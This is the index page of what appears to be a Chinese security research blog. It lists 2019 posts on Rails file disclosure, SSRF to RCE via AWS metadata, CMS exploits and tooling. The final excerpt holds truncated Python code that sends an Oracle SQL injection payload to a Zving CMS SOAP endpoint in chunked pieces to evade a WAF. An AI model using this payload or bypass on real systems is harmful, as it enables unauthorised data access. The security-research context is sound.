Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

Python 一个 pip 报错 ProxyError 的处理

March 20, 2019

Python 一个 pip 报错 ProxyError 的处理

Python 一个 pip 报错 ProxyError 的处理

March 20, 2019

Vimium 与 Chrome 快捷键组合使用提高浏览器使用效率

Vimium 与 Chrome 快捷键组合使用提高浏览器使用效率

March 20, 2019

关于域名 canonicalizer.ucsuri.tcs

关于域名 canonicalizer.ucsuri.tcs

March 19, 2019

开源项目 | BurpCollector 利用 BurpSuite 收集字典

开源项目 | BurpCollector 利用 BurpSuite 收集字典

March 19, 2019

CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

March 18, 2019

【Bug Bounty 阅读笔记】【Synack】 Using AWS Metadata API to escalate SSRF to RCE

Using AWS Metadata API to escalate SSRF to RCE

March 18, 2019

APK 调试遇到 安装失败 的一些问题

APK 调试遇到 安装失败 的一些问题

March 17, 2019

常见 CMS 漏洞 exp 案例集合

常见 CMS 漏洞 exp 案例集合

March 17, 2019

maven 环境配置与简易打包

maven 环境配置与简易打包

March 15, 2019

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

分块传输绕过 WAF <!–more–> 基本信息 import requests from io import BytesIO def read_in_chunks(file_object, chunk_size=3): while True: data = file_object.read(chunk_size) if not data: break yield data data = r”’&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:web=&quot;http://webservice.cms.zving.com&quot;&gt; &lt;soapenv:Header/&gt; &lt;soapenv:Body&gt; &lt;web:addCatalog&gt; &lt;web:in0&gt;2&lt;/web:in0&gt; &lt;web:in1&gt;{sql}&lt;/web:in1&gt; &lt;web:in2&gt;1&lt;/web:in2&gt; &lt;web:in3&gt;1&lt;/web:in3&gt; &lt;/web:addCatalog&gt; &lt;/soapenv:Body&gt; &lt;/soapenv:Envelope&gt;”’ sql = r&quot;’ or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null–&quot; data = BytesIO(data.format(sql=sql)) […]